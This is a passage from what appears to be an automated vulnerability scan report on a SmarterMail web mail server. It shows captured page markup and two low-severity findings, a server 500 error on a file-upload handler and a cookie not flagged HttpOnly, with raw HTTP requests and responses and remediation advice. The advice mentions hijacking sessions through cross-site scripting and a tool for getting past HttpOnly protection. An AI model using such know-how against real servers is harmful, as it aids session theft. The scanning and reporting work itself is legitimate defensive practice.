<div class='hmMenuBar'><ul class='hmMenu hmMenuBar hmList' id='ctl00_Split_LP_ctl01_menuContacts' name='ctl00$Split$LP$ctl01$menuContacts' style='z-index:1001'>
<li class='hmItem hmFirst' id='ctl00_Split_LP_ctl01_menuContacts_menuGlobalNew' style='z-index: 1001'><a class='hmA hmHasChildren' href='#'>New<span class='hmArrow'></span></a>
<div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
<li class='hmItem hmFirst' id='ctl00_Split_LP_ctl01_menuContacts_menuGlobalNew_b7d9b2bd5f28443c84a0178adbb0a050' style='z-index: 1001'><a class='hmA' href='#'>New Message</a></li>
<li class='hmItem' id='ctl00_Split_LP_ctl01_menuContacts_menuGlobalNew_1413e4ca1c0040fc9dd9651dd66aaf9b' style='z-index: 1001'><a class='hmA' href='#'>New Contact</a></li>
<li class='hmItem' id='ctl00_Split_LP_ctl01_menuContacts_menuGlobalNew_148b4e3c58354e7e908efb233bd9300f' style='z-index: 1001'><a class='hmA' href='#'>New Appointment</a></li>
<li class='hmItem' id='ctl00_Split_LP_ctl01_menuContacts_menuGlobalNew_7239e2ab6f054d5e84c1686297ff21c4' style='z-index: 1001'><a class='hmA' href='#'>New Task</a></li>
<li class='hmItem hmLast' id='ctl00_Split_LP_ctl01_menuContacts_menuGlobalNew_5ad20d5a60cf4a20a34edf0b2e089837' style='z-index: 1001'><a class='hmA' href='#'>New Note</a></li>
</ul><div class='hmScrollDown'></div></div>
</li>
<li class='hmItem' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsActions' style='z-index: 1001'><a class='hmA hmHasChildren' href='#'>Actions<span class='hmArrow'></span></a>
<div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
<li class='hmItem hmFirst' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsActions_menuSelectAll' style='z-index: 1001'><a class='hmA' href='#'>Select All</a></li>
<li class='hmItem' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsActions_menuDelete' style='z-index: 1001'><a class='hmA' href='#'>Delete</a></li>
<li class='hmItem' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsActions_menuEmailSelected' style='z-index: 1001'><a class='hmA' href='#'>Send Email</a></li>
<li class='hmItem' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsActions_menuAddToOutlook' style='z-index: 1001'><a class='hmA' href='#'>Add to Outlook</a></li>
<li class='hmItem hmLast' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsActions_menuImportExport' style='z-index: 1001'><a class='hmA hmHasChildren' href='#'>Import/Export<span class='hmArrow'></span></a>
<div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
<li class='hmItem hmFirst' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsActions_menuImportExport_menuImport' style='z-index: 1001'><a class='hmA' href='#'>Import</a></li>
<li class='hmItem' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsActions_menuImportExport_menuExport' style='z-index: 1001'><a class='hmA' href='#'>Export</a></li>
<li class='hmItem hmLast' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsActions_menuImportExport_menuExportAll' style='z-index: 1001'><a class='hmA' href='#'>Export All</a></li>
</ul><div class='hmScrollDown'></div></div>
</li>
</ul><div class='hmScrollDown'></div></div>
</li>
<li class='hmItem hmLast' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView' style='z-index: 1001'><a class='hmA hmHasChildren' href='#'>View<span class='hmArrow'></span></a>
<div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
<li class='hmItem hmFirst' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsFilter' style='z-index: 1001'><a class='hmA hmHasChildren' href='#'>Filter<span class='hmArrow'></span></a>
<div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
<li class='hmItem hmFirst' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsFilter_menuContactsFilterCategory' style='z-index: 1001'><a class='hmA hmHasChildren' href='#'>Category<span class='hmArrow'></span></a>
<div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
<li class='hmItem hmFirst hmCheckable hmChecked' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsFilter_menuContactsFilterCategory_menuCategoryAllCategories' style='z-index: 1001'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsFilter_menuContactsFilterCategory_menuCategoryAllCategories_CB' group='category' type='checkbox'checked='checked'></div>All Categories</a></li>
<li class='hmItem hmCheckable' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsFilter_menuContactsFilterCategory_menuaCategoryNOCATEGORY' style='z-index: 1001'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsFilter_menuContactsFilterCategory_menuaCategoryNOCATEGORY_CB' group='category' type='checkbox'></div>No Category</a></li>
<li class='hmItem hmLast hmCheckable' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsFilter_menuContactsFilterCategory_menuCate1' style='z-index: 1001'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsFilter_menuContactsFilterCategory_menuCate1_CB' group='category' type='checkbox'></div>1</a></li>
</ul><div class='hmScrollDown'></div></div>
</li>
<li class='hmSeperator' style='z-index:1001'><span><!-- --></span></li>
<li class='hmItem hmLast' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsFilter_menuContactsFilterClear' style='z-index: 1001'><a class='hmA' href='#'>Reset Filter</a></li>
</ul><div class='hmScrollDown'></div></div>
</li>
<li class='hmItem' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsSort' style='z-index: 1001'><a class='hmA hmHasChildren' href='#'>Sort<span class='hmArrow'></span></a>
<div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
<li class='hmItem hmFirst hmCheckable hmChecked' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsSort_menuContactsSortAsc' style='z-index: 1001'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsSort_menuContactsSortAsc_CB' group='Sort' type='checkbox'checked='checked'></div>Ascending</a></li>
<li class='hmItem hmCheckable' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsSort_menuContactsSortDesc' style='z-index: 1001'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsSort_menuContactsSortDesc_CB' group='Sort' type='checkbox'></div>Descending</a></li>
<li class='hmSeperator' style='z-index:1001'><span><!-- --></span></li>
<li class='hmItem hmCheckable hmChecked' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsSort_menuContactsSortDisplayName' style='z-index: 1001'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsSort_menuContactsSortDisplayName_CB' group='SortType' type='checkbox'checked='checked'></div>Display Name</a></li>
<li class='hmItem hmCheckable' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsSort_menuContactsSortEmailAddress' style='z-index: 1001'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsSort_menuContactsSortEmailAddress_CB' group='SortType' type='checkbox'></div>Email</a></li>
<li class='hmItem hmLast hmCheckable' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsSort_menuContactsSortCompany' style='z-index: 1001'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsSort_menuContactsSortCompany_CB' group='SortType' type='checkbox'></div>Company</a></li>
</ul><div class='hmScrollDown'></div></div>
</li>
<li class='hmSeperator' style='z-index:1001'><span><!-- --></span></li>
<li class='hmItem hmLast' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuColumns' style='z-index: 1001'><a class='hmA' href='#'>Visible Fields</a></li>
</ul><div class='hmScrollDown'></div></div>
</li>
</ul>
</div>
<div class='hmClear'><!-- --></div>
</div>
<div id="FilterBar" class="FilterBar" style="visibility: hidden">
<div id="FilterBarContents" class="RoundedSearchBox">
<div class="RoundedSearchBoxLeft">
<div class="RoundedSearchBoxRight">
<label for="ctl00_Split_LP_ctl01_searchBarContacts_FilterBox" id="ctl00_Split_LP_ctl01_searchBarContacts_FilterBoxLabel" style="display: none">Search...</label>
<div id="ctl00_Split_LP_ctl01_searchBarContacts_btnGo" class="BBButton GoButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$Split$LP$ctl01$searchBarContacts$btnGo',''); return false;"><span class="BBInner"></span></a></div>
<input name="ctl00$Split$LP$ctl01$searchBarContacts$FilterBox" type="text" id="ctl00_Split_LP_ctl01_searchBarContacts_FilterBox" autocomplete="off" />
<div id="ctl00_Split_LP_ctl01_searchBarContacts_btnClear" class="BBButton ClearButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$Split$LP$ctl01$searchBarContacts$btnClear',''); return false;"><span class="BBInner"></span></a></div>
</div>
</div>
</div>
<a id="ctl00_Split_LP_ctl01_lnkFilter" href="javascript:__doPostBack('ctl00$Split$LP$ctl01$lnkFilter','')"></a>
</div>
<div id="LeftScrollable" class="ContentDiv">
<span id="ctl00_Split_LP_ctl01_HyperMenu1">
<!-- HyperMenu -->
<div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_Split_LP_ctl01_ctl00' name='ctl00$Split$LP$ctl01$ctl00' style='z-index:800'>
<li class='hmItem hmFirst' id='ctl00_Split_LP_ctl01_ctl00_hm0' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
<li class='hmItem hmLast' id='ctl00_Split_LP_ctl01_ctl00_hm1' style='z-index: 800'><a class='hmA' href='#'>Send Email</a></li>
</ul>
<div class='hmScrollDown'></div></div>
</div>
</span>
<table id="ctl00_Split_LP_ctl01_grdContactsOuterTable" class="HyperGridOuter" style="border-collapse:collapse;border-spacing:0px;width:100%;">
<tr>
<td class="HyperGridContentCell" id="ctl00_Split_LP_ctl01_grdContactsContentCell" style="padding:0;vertical-align:top;" >
<div class="HyperGridWrapper" id="ctl00_Split_LP_ctl01_grdContacts" style="padding-right:0;">
<div id="ctl00_Split_LP_ctl01_grdContactsHeaderWrapper" style="display:none">
<table id="ctl00_Split_LP_ctl01_grdContactsHeaderTable" class="HyperGrid" style="table-layout: fixed">
<colgroup><col /><col /></colgroup>
<thead>
<tr><th scope="col" class="showsel lc nw CheckBoxColumn" style="overflow: hidden"><input type="checkbox" id="ctl00_Split_LP_ctl01_grdContactsCheckAll" name="ctl00$Split$LP$ctl01$grdContactsCheckAll" /></th><th scope="col" class="rc al nw BoldFirstMultiLine" style="overflow: hidden">Contact</th></tr>
</thead>
</table>
</div>
<div id="ctl00_Split_LP_ctl01_grdContactsContentWrapper" class="HyperGridContentWrapper" style="overflow-y:hidden;overflow-x:visible;">
<table id="ctl00_Split_LP_ctl01_grdContactsContentTable" class="HyperGrid">
<colgroup><col /><col /></colgroup>
</table>
</div>
</div>
</td>
</tr>
</table>
<div id="ctl00_Split_LP_ctl01_grdContactsScroller" class="HyperGridScroller" style="visibility:hidden;position:relative;width:22px;overflow-y:scroll;" ><div id="ctl00_Split_LP_ctl01_grdContactsInnerScroller" style="height: 10px"></div></div>
<div style="position:absolute;top:-100px;width:0;height:0;">
<input id="ctl00_Split_LP_ctl01_grdContactsFocuser" type="text" style="width:1px;height:1px;margin:0;padding:0;outline:none;border:none" />
<input id="ctl00_Split_LP_ctl01_grdContactsSelectedIDs" name="ctl00$Split$LP$ctl01$grdContactsSelectedIDs" type="text" style="width:1px;height:1px;margin:0;padding:0;outline:none;border:none" />
<input id="ctl00_Split_LP_ctl01_grdContactsScrollPos" name="ctl00$Split$LP$ctl01$grdContactsScrollPos" type="text" style="width:1px;height:1px;margin:0;padding:0;outline:none;border:none" />
</div>
</div>
<div id="ctl00_Split_LP_ctl01_Footer" class="Footer">
<div class="FooterSummary">
<span id="ctl00_Split_LP_ctl01_lblCount">0 contact(s)</span>
</div>
</div>
|0|hiddenField|__EVENTTARGET||0|hiddenField|__EVENTARGUMENT||208|hiddenField|__VIEWSTATE|/wEPDwUKLTcwODg1MTE2Ng8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlZBgBBSBjdGwwMCRTcGxpdCRMUCRjdGwwMSRncmRDb250YWN0cw8FJFRydWV8VHJ1ZXx8RmFsc2V8VHJ1ZXx8RmFsc2V8RmFsc2V8MGT8XpaY8h6fxawd0JLTm1yS3kkTOg==|24|asyncPostBackControlIDs||ctl00$Split$LP$lnkUpdate|0|postBackControlIDs|||34|updatePanelIDs||tctl00$Split$LP$StyledUpdatePanel1|0|childUpdatePanelIDs|||33|panelsToRefreshIDs||ctl00$Split$LP$StyledUpdatePanel1|2|asyncPostBackTimeout||90|12|formAction||default.aspx|1|pageTitle||3|170|scriptBlock|ScriptPath|/ScriptResource.axd?d=9LtTppofNdzfPwjqAv6ngOF_m3Ok_PFqwhuv90rOoA_SHM2fVCRbipJCEnE9OMFtjNNZaXF1BttRFjWpHbAPstCjdZSr2uDpU6O2NTF1ISnP_zYh5FLRQP7rbZ36OXJ90&t=ffffffff8fb8c655|796|scriptBlock|ScriptContentWithTags|{"text":"\r\n var startup = function() {\r\n $(\"#FilterBarContents\").magicLabels();\r\n\r\n $(\"#ctl00_Split_LP_ctl01_searchBarContacts_FilterBox\&q..
Internal Server Error
Internal Server Error
1
TOTAL
LOW
CONFIRMED
1
The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior should be analysed carefully. If Netsparker is able to find a security issue in the same resource it will report this as a separate vulnerability.
Impact
The impact may vary depending on the condition. This might be an indication of a bigger issue such as SQL Injection or could be the result or poor coding practices.
Remedy
Analyse this issue and review the application code in order to handle unexpected errors, this should be a generic practice which does not disclose further information upon an error. All errors should be handled server side only.
|
- /Main/FileStorageUpload.ashx
/Main/FileStorageUpload.ashx CONFIRMED |
Request
GET /Main/FileStorageUpload.ashx?uploadValidationToken=def234bfb6a5429880f5ef74e1fe9c71&pathField=Root+Folder%5c&userField=dummy&domainField=hoytllc.com HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmStoredFiles.aspx?path=Root+Folder%5c
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn; SelectedLanguage=en
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmStoredFiles.aspx?path=Root+Folder%5c
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn; SelectedLanguage=en
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.0 500 Internal Server Error
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 00:34:38 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html
Connection: Close
</pre></table></table></table></table></table></font></font></font></font></font></i></i></i></i></i></b></b></b></b></b></u></u></u></u></u><p> </p><hr>
<html>
<head>
<title>Runtime Error</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Runtime Error</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine.
<br><br>
<b>Details:</b> To enable the details of this specific error message to be viewable on remote machines, please create a <customErrors> tag within a "web.config" configuration file located in the root directory of the current web application. This <customErrors> tag should then have its "mode" attribute set to "Off".<br><br>
<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>
<!-- Web.Config Configuration File -->
<configuration>
<system.web>
<customErrors mode="Off"/>
</system.web>
</configuration></pre></code>
</td>
</tr>
</table>
<br>
<b>Notes:</b> The current error page you are seeing can be replaced by a custom error page by modifying the "defaultRedirect" attribute of the application's <customErrors> configuration tag to point to a custom error page URL.<br><br>
<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>
<!-- Web.Config Configuration File -->
<configuration>
<system.web>
<customErrors mode="RemoteOnly" defaultRedirect="mycustompage.htm"/>
</system.web>
</configuration></pre></code>
</td>
</tr>
</table>
<br>
</body>
</html>
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 00:34:38 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html
Connection: Close
</pre></table></table></table></table></table></font></font></font></font></font></i></i></i></i></i></b></b></b></b></b></u></u></u></u></u><p> </p><hr>
<html>
<head>
<title>Runtime Error</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Runtime Error</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine.
<br><br>
<b>Details:</b> To enable the details of this specific error message to be viewable on remote machines, please create a <customErrors> tag within a "web.config" configuration file located in the root directory of the current web application. This <customErrors> tag should then have its "mode" attribute set to "Off".<br><br>
<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>
<!-- Web.Config Configuration File -->
<configuration>
<system.web>
<customErrors mode="Off"/>
</system.web>
</configuration></pre></code>
</td>
</tr>
</table>
<br>
<b>Notes:</b> The current error page you are seeing can be replaced by a custom error page by modifying the "defaultRedirect" attribute of the application's <customErrors> configuration tag to point to a custom error page URL.<br><br>
<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>
<!-- Web.Config Configuration File -->
<configuration>
<system.web>
<customErrors mode="RemoteOnly" defaultRedirect="mycustompage.htm"/>
</system.web>
</configuration></pre></code>
</td>
</tr>
</table>
<br>
</body>
</html>
Cookie Not Marked As HttpOnly
Cookie Not Marked As HttpOnly
1
TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..
Impact
During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.Actions to Take
- See the remedy for solution
- Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.
Remedy
Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.
External References
|
- /Login.aspx
/Login.aspx CONFIRMED |
Identified Cookie
SelectedLanguage
Request
POST /Login.aspx HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn
Content-Length: 862
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
__EVENTARGUMENT=1&__EVENTTARGET=1&__LASTFOCUS=1&__VIEWSTATE=%2fwEPDwUKLTI4NzA5NDYyNg8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWAgIFD2QWAmYPZBYGAgMPZBYCAgEPFgIeBFRleHRlZAIFD2QWAgILDxAPFgIfAgULUmVtZW1iZXIgbWVkZGRkAgcPZBYGAgEPEGQQFQIUVXNlIEJyb3dzZXIgTGFuZ3VhZ2UHRW5nbGlzaBUCAAJlbhQrAwJnZxYBZmQCAw8PFgIeC05hdmlnYXRlVVJMBWhodHRwOi8vd3d3LnNtYXJ0ZXJ0b29scy5jb20vSGVscC9TbWFydGVyTWFpbC92Ny9EZWZhdWx0LmFzcHg%2fcD1fVVNSJnY9Ny4yLjM5MjUmbGFuZz1lbi1VUyZwYWdlPUxvZ2luVXNlcmRkAgcPDxYIHghJbWFnZVVybAUGL3MuZ2lmHgVXaWR0aBsAAAAAAAAAAAEAAAAeBkhlaWdodBsAAAAAAAAAAAEAAAAeBF8hU0ICgANkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUWY3RsMDAkTVBIJGNoa0F1dG9Mb2dpbgUXY3RsMDAkQlBIJGJ0bkVudGVyQ2xpY2sEHZ%2fxDsa2Ruq8vSjNI7VPml35tg%3d%3d&ctl00$BPH$btnEnterClick=1&ctl00$BPH$LanguageList=1&ctl00$MPH$chkAutoLogin=1&ctl00$MPH$txtPassword=1&ctl00$MPH$txtUserName=1
Referer: http://vulnerable.smartermail.7.x.host:9998/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn
Content-Length: 862
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
__EVENTARGUMENT=1&__EVENTTARGET=1&__LASTFOCUS=1&__VIEWSTATE=%2fwEPDwUKLTI4NzA5NDYyNg8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWAgIFD2QWAmYPZBYGAgMPZBYCAgEPFgIeBFRleHRlZAIFD2QWAgILDxAPFgIfAgULUmVtZW1iZXIgbWVkZGRkAgcPZBYGAgEPEGQQFQIUVXNlIEJyb3dzZXIgTGFuZ3VhZ2UHRW5nbGlzaBUCAAJlbhQrAwJnZxYBZmQCAw8PFgIeC05hdmlnYXRlVVJMBWhodHRwOi8vd3d3LnNtYXJ0ZXJ0b29scy5jb20vSGVscC9TbWFydGVyTWFpbC92Ny9EZWZhdWx0LmFzcHg%2fcD1fVVNSJnY9Ny4yLjM5MjUmbGFuZz1lbi1VUyZwYWdlPUxvZ2luVXNlcmRkAgcPDxYIHghJbWFnZVVybAUGL3MuZ2lmHgVXaWR0aBsAAAAAAAAAAAEAAAAeBkhlaWdodBsAAAAAAAAAAAEAAAAeBF8hU0ICgANkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUWY3RsMDAkTVBIJGNoa0F1dG9Mb2dpbgUXY3RsMDAkQlBIJGJ0bkVudGVyQ2xpY2sEHZ%2fxDsa2Ruq8vSjNI7VPml35tg%3d%3d&ctl00$BPH$btnEnterClick=1&ctl00$BPH$LanguageList=1&ctl00$MPH$chkAutoLogin=1&ctl00$MPH$txtPassword=1&ctl00$MPH$txtUserName=1
Response
HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 00:34:22 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Set-Cookie: SelectedLanguage=en; expires=Sat, 03-Oct-2020 00:34:22 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3334
Connection: Close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
SmarterMail Login - hoytllc.com - SmarterMail
</title>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />
<script type="text/javascript">
if (parent.isRoot != null)
parent.location.href = location.href;
if (parent.parent.isRoot != null)
parent.parent.location.href = location.href;
</script>
<link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Main/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Mail/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Login/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Telerik&rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="Login" dir="ltr">
<form method="post" action="Login.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__LASTFOCUS" id="__LASTFOCUS" value="" />
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTI4NzA5NDYyNg8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWAgIFD2QWAmYPZBYGAgMPZBYCAgEPFgIeBFRleHRlZAIFD2QWAgILDxAPFgIfAgULUmVtZW1iZXIgbWVkZGRkAgcPZBYGAgEPEGQQFQIUVXNlIEJyb3dzZXIgTGFuZ3VhZ2UHRW5nbGlzaBUCAAJlbhQrAwJnZxYBZmQCAw8PFgIeC05hdmlnYXRlVVJMBWhodHRwOi8vd3d3LnNtYXJ0ZXJ0b29scy5jb20vSGVscC9TbWFydGVyTWFpbC92Ny9EZWZhdWx0LmFzcHg/cD1fVVNSJnY9Ny4yLjM5MjUmbGFuZz1lbi1VUyZwYWdlPUxvZ2luVXNlcmRkAgcPDxYIHghJbWFnZVVybAUGL3MuZ2lmHgVXaWR0aBsAAAAAAAAAAAEAAAAeBkhlaWdodBsAAAAAAAAAAAEAAAAeBF8hU0ICgANkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUWY3RsMDAkTVBIJGNoa0F1dG9Mb2dpbgUXY3RsMDAkQlBIJGJ0bkVudGVyQ2xpY2sEHZ/xDsa2Ruq8vSjNI7VPml35tg==" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&t=633802452069218315" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&t=ffffffffec2d9970" type="text/javascript"></script>
